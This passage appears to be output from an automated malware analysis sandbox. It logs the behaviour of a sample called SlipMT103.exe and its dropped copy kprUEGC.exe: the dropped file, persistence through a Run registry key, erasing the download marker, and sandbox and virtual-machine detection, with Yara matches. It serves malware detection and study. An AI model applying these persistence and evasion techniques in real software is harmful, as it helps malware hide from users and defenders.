                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 13_2_00979361 push ds; retf
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.88568951342
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.88568951342
                      Source: C:\Users\user\Desktop\SlipMT103.exeFile created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeJump to dropped file
                      Source: C:\Users\user\Desktop\SlipMT103.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kprUEGCJump to behavior
                      Source: C:\Users\user\Desktop\SlipMT103.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kprUEGCJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Users\user\Desktop\SlipMT103.exeFile opened: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\Desktop\SlipMT103.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 0.2.SlipMT103.exe.2b58e5c.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.kprUEGC.exe.3408f00.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.kprUEGC.exe.349b0f8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SlipMT103.exe.2beae3c.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.360382819.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.451118533.00000000033A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.451324743.000000000346B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.360569240.0000000002BBA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SlipMT103.exe PID: 6388, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: kprUEGC.exe PID: 2900, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: SlipMT103.exe, 00000000.00000002.360382819.0000000002AF1000.00000004.00000001.sdmp, SlipMT103.exe, 00000000.00000002.360569240.0000000002BBA000.00000004.00000001.sdmp, kprUEGC.exe, 0000000A.00000002.451324743.000000000346B000.00000004.00000001.sdmp, kprUEGC.exe, 0000000A.00000002.451118533.00000000033A1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: SlipMT103.exe, 00000000.00000002.360382819.0000000002AF1000.00000004.00000001.sdmp, SlipMT103.exe, 00000000.00000002.360569240.0000000002BBA000.00000004.00000001.sdmp, kprUEGC.exe, 0000000A.00000002.451324743.000000000346B000.00000004.00000001.sdmp, kprUEGC.exe, 0000000A.00000002.451118533.00000000033A1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\SlipMT103.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\SlipMT103.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436Thread sleep time: -7378697629483816s >= -30000s
                      Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436Thread sleep time: -240000s >= -30000s
                      Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6440Thread sleep count: 1554 > 30
                      Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436Thread sleep time: -239859s >= -30000s
                      Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6440Thread sleep count: 713 > 30
                      Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6392Thread sleep time: -40889s >= -30000s
                      Source: C:\Users\user\Desktop\SlipMT103.exe TID: 6436Thread sleep time: -239750s >= -30000s
